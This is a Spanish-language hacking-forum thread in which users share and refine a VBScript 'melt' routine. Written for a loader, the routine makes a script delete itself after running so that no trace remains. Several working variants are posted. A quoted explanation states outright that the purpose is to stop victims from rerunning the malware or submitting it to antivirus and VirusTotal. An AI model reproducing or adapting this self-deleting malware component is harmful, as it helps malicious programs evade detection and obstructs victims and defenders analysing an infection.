elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [VBS]Perfect Melt
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [VBS]Perfect Melt  (Leído 3,661 veces)
xXSCORPIOXx

Desconectado Desconectado

Mensajes: 26



Ver Perfil
[VBS]Perfect Melt
« en: 18 Marzo 2014, 01:25 am »

Bueno, este Melt lo acabo de hacer para el SafeLoader 2.0, trata de no dejar ningun rastro del archivo, por eso todo se hace "On the Fly".  >:D

Código
  1. sMelt(WScript.ScriptFullName)
  2.  
  3. Function sMelt(sFile)
  4.    On Error Resume Next
  5.  
  6. Dim sFunction
  7.  
  8.    sFunction = "WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & sFile & Chr(34)
  9.  
  10. Execute(sFunction)
  11. End Function

//Regards.


En línea

El saber es como el alcohol, cuando ves que te duele la cabeza, es demasiado tarde.
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [VBS]Perfect Melt
« Respuesta #1 en: 18 Marzo 2014, 11:17 am »

Me viene perfecto para mi proyecto. Lo puedo usar?


En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
xXSCORPIOXx

Desconectado Desconectado

Mensajes: 26



Ver Perfil
Re: [VBS]Perfect Melt
« Respuesta #2 en: 18 Marzo 2014, 15:06 pm »

Eso ni se pregunta bro.  ;D

//Regards.
En línea

El saber es como el alcohol, cuando ves que te duele la cabeza, es demasiado tarde.
PedroDJavier
Visitante


Email
Re: [VBS]Perfect Melt
« Respuesta #3 en: 18 Marzo 2014, 15:29 pm »

Perdona mi ignorancia  :P esto se supone que borra un archivo o como xD

Un  saludo
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [VBS]Perfect Melt
« Respuesta #4 en: 18 Marzo 2014, 16:16 pm »

Perdona mi ignorancia  :P esto se supone que borra un archivo o como xD

Un  saludo

[Source] How to Melt a file in VB6
http://foro.elhacker.net/programacion_visual_basic/source_how_to_melt_a_file_in_vb6-t164724.0.html

Aquí lo explica todo, sería la función Melt para VB6:

Citar
Definición
Se llama "Melt" cuando un usuario ejecuta un archivo y este desaparece (se auto-elimina) después de ejecutarse, esta función es necesaria para evitar que nuestra víctima ejecute 2 veces nuestro malware o evitar que la victima lo envíe a un Antivirus o a virustotal después de ejecutarlo, su estructura es...

1) Ejecuto el archivo (A)
2) El archivo (A) se copia en otro lugar (B)
3) El archivo (A) ejecuta el archivo (B)
4) El archivo (B) borra el archivo (A)
5) El archivo (B) sigue ejecutando el resto de malware...
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: [VBS]Perfect Melt
« Respuesta #5 en: 20 Marzo 2014, 17:28 pm »

HOLA!!!

Por que no optimizamos el codigo un poco:

Código
  1.    sMelt(WScript.ScriptFullName)
  2.  
  3.    Function sMelt(sFile)
  4.       On Error Resume Next
  5.       Execute("WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & sFile & Chr(34))
  6.    End Function

GRACIAS POR LEER!!!
En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
xXSCORPIOXx

Desconectado Desconectado

Mensajes: 26



Ver Perfil
Re: [VBS]Perfect Melt
« Respuesta #6 en: 21 Marzo 2014, 01:39 am »

HOLA!!!

Por que no optimizamos el codigo un poco:

Código
  1.    sMelt(WScript.ScriptFullName)
  2.  
  3.    Function sMelt(sFile)
  4.       On Error Resume Next
  5.       Execute("WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & sFile & Chr(34))
  6.    End Function

GRACIAS POR LEER!!!

Me gusta declarar las cosas, y mas en una funcion.

//Regards.
En línea

El saber es como el alcohol, cuando ves que te duele la cabeza, es demasiado tarde.
79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: [VBS]Perfect Melt
« Respuesta #7 en: 21 Marzo 2014, 01:58 am »

HOLA!!!

Esta bien lo que planteas, pero planteate para que declaras sFunction, si se usa una sola vez, osea, perdes 2 lineas de codigo y reservas un espacio en memoria que no sera necesario nunca mas.

Esta bien que quieras declararla pero quiero que entiendas que no es practico, no mejora la lectura del codigo, no mejora la longitud del codigo y tampoco el rendimiento.

Es mas, no quise cambiarte la parte que dice sFile por que tampoco es necesaria, ya que siempre sera WScript.ScriptFullName... sino no seria Melt seria una funcion para eliminado con retraso desde otro script.

Por ende tu codigo si se quiere Funcionalizar (ser llamado de una funcion) si lo reducimos al maximo seria asi:
Voy a usar un sub para no entregar retorno (que tampoco entrega tu funcion).
Código
  1. sMelt()
  2.  
  3.       Sub sMelt()
  4.          On Error Resume Next
  5.          Execute("WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & WScript.ScriptFullName & Chr(34))
  6.       End Sub

Se podria seguir reduciendo quitando las llamadas a Chr(34) ahi si convendria usar una variable para no llamar tantas veces a una funcion con el mismo parametro, aunque tambien podrias poner las comillas dentro del string sin usar ni un Chr usando "" supongo, no lo testee aun esto ultimo de la doble comilla doble.

GRACIAS POR LEER!!!
« Última modificación: 21 Marzo 2014, 02:07 am por 79137913 » En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Source] How to Melt a file in VB6 « 1 2 »
Programación Visual Basic
Mad Antrax 16 10,635 Último mensaje 19 Mayo 2007, 18:28 pm
por hepy_92
Melt « 1 2 3 »
Programación Visual Basic
nhaalclkiemr 29 8,871 Último mensaje 8 Febrero 2008, 23:14 pm
por nhaalclkiemr
Melt
Programación Visual Basic
fary 1 1,666 Último mensaje 6 Agosto 2010, 20:36 pm
por BlackZeroX
[Pregunta 'basica'] Que es Melt?
Análisis y Diseño de Malware
CAR3S? 3 3,407 Último mensaje 15 Abril 2011, 22:34 pm
por CAR3S?
[Reto Batch] Melt ($Edu$) « 1 2 3 4 »
Scripting
Eleкtro 39 15,286 Último mensaje 23 Diciembre 2012, 18:19 pm
por Segadorfelix
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines